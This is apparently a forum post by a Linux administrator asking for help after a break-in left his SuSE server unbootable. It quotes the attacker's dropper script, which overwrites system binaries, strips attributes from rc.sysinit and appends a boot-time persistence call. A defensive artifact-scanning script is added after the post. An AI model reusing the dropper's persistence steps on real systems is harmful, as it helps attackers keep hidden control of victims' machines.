Unfortunately I left SuSE Linux 8.0 Professional Server open tonight. SuSE Firewall 2 was temporarily deactivated. At 2 PM somebody from outside managed to implant a virus (dir /mihai and files like /.mihai, /mihai.tgz, /mihai/inst etc.). At the same time /etc/rc.d/rc.sysinit was overwritten (with a call to wrapper) and the files /usr/bin/wrapper as well as /usr/sbin/wrapper have been overwritten with the code of /mihai. I'm not sure, but it looks like other files have been affected as well (sendmail has gotten a date of tonight and is much larger than the original sendmail).

Before I rebooted the server I removed /usr/bin/wrapper and /usr/sbin/wrapper.

Now, the server will no longer boot. After mounting the file systems (reiserfs) the following messages appear:

mounting local filesystems
proc on /proctyp proc (rw)

Then the server hangs.

How can I get the server up again? It doesn't matter to me if I have to reinstall all software as long as I don't need to destroy my partitions and, more important, the file system on hda3, since I have a backup of all important config files and all data files on hda3.

I tried to reinstall from CD, but this doesn't work either (options freely translated from German):

- New Install
  Will create new partitions and overwrite my HD!?!
- Update existing system
  Does not boot (same as normal boot from disk)
- Start installed system
  Does not boot (same as normal boot from disk)

What can I do? Any hints are welcome.

This is what /mihai/inst looks like:

---------------------------------------------------------------
#/bin/bash
echo "Start Daemon"
sleep 1
./kill
cp -f mihai /usr/bin/wrapper
cp -f mihai /usr/sbin/wrapper
sleep 1
wrapper
chattr -AacdisSu /etc/rc.d/rc.sysinit
echo >>/etc/rc.d/rc.sysinit "#Start Wrapper"
echo >>/etc/rc.d/rc.sysinit wrapper
sleep 1
rm -rf mihai.tgz
rm -rf mihai
echo "Done"
---------------------------------------------------------------

Does anybody know this virus?

Peter
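
Added example, not part of the original post: a read-only check of an offline root filesystem for the paths and rc.sysinit lines named in the post. The function name scan_root and the /mnt mount point (the damaged root partition mounted from rescue media) are assumptions.

```sh
#!/bin/sh
# Added example: nothing on the inspected filesystem is modified.
# scan_root is a hypothetical helper; ROOT defaults to /mnt (assumption).

scan_root() {
    root=${1:-/mnt}
    root=${root%/}
    hits=0

    # Paths the post reports as dropped or overwritten.
    for p in /mihai /.mihai /mihai.tgz /mihai/inst \
             /usr/bin/wrapper /usr/sbin/wrapper; do
        if [ -e "$root$p" ] || [ -L "$root$p" ]; then
            echo "FOUND $p"
            hits=$((hits + 1))
        fi
    done

    # The two lines the inst script appends to rc.sysinit:
    # "#Start Wrapper" and a bare "wrapper" call.
    rc=$root/etc/rc.d/rc.sysinit
    if [ -f "$rc" ]; then
        lines=$(grep -n -E '^(#Start Wrapper|wrapper)[[:space:]]*$' "$rc" || true)
        if [ -n "$lines" ]; then
            printf '%s\n' "$lines" | sed 's|^|RCLINE /etc/rc.d/rc.sysinit:|'
            hits=$((hits + 1))
        fi
    fi

    echo "TOTAL $hits"
    [ "$hits" -eq 0 ]   # status 0 = none of the artifacts found, 1 = found
}

# Runs only when a mount point is given, e.g.: sh scan.sh /mnt
if [ $# -gt 0 ]; then
    scan_root "$1"
fi
```

Each RCLINE entry carries the line number in rc.sysinit, so the appended lines can be located in an editor from the rescue system.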